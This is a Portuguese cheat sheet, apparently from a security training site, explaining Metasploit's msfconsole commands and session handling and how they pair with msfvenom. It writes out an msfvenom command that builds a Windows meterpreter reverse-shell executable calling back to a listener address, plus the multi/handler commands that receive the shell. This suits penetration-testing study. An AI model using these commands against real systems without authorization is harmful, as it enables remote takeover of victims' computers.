Skip to main content

Msfconsole | Msfvenom | Solyd One

  • Msfconsole | Msfvenom | Solyd One

Comandos Fundamentais

ComandoFunção
search <termo>Busca módulos por nome ou descrição
use <caminho_do_módulo>Carrega o módulo para uso
infoExibe detalhes do módulo selecionado
show optionsMostra as opções configuráveis
set <OPCAO> <valor>Define um valor para uma opção
unset <OPCAO>Remove o valor de uma opção
exploit ou runExecuta o módulo carregado
sessionsLista ou gerencia sessões abertas
backRetorna ao menu anterior
exitSai do msfconsole

Gerenciamento de Sessões

  • sessions -l : Lista sessões ativas
  • sessions -i <ID> : Interage com uma sessão
  • sessions -k <ID> : Encerra uma sessão
  • background : Envia a sessão ao plano de fundo

🧠 Diferença entre msfvenom e msfconsole

FerramentaFunção Principal
msfvenomGera payloads e arquivos executáveis (shells, meterpreter, scripts)
msfconsoleControla, executa e gerencia os módulos do Metasploit (exploit, payload, sessões)

📦 msfvenom: Gerador de Payloads

🔹 O que ele faz:

  • Cria payloads customizados
  • Codifica e embala payloads em arquivos .exe, .elf, .apk, .py, .sh, etc.
  • Permite testar defesas com shells reversos, binds, meterpreter, etc.
  • Não executa nada por conta própria — só gera o artefato

🔧 Exemplos do que ele produz:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f exe -o shell.exe

Resultado: um executável Windows com comportamento de shell reverso.


🖥 msfconsole: Console Interativo

🔹 O que ele faz:

  • Interface de linha de comando do Metasploit
  • Executa exploits e escuta conexões
  • Gerencia sessões abertas por payloads
  • Usa módulos como exploit/multi/handler para receber shells
  • Permite pós-exploração via meterpreter, coleta de informações, etc.

⚙️ Exemplo:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10
set LPORT 4444
exploit

Resultado: fica escutando uma conexão reversa iniciada por um payload.


🔁 Como eles se conectam

  1. msfvenom gera um payload configurado com IP/porta para se conectar de volta
  2. msfconsole escuta na porta especificada
  3. Quando o payload é executado, o msfconsole recebe a conexão
  4. Você então interage com o alvo por meio de uma sessão (ex: meterpreter)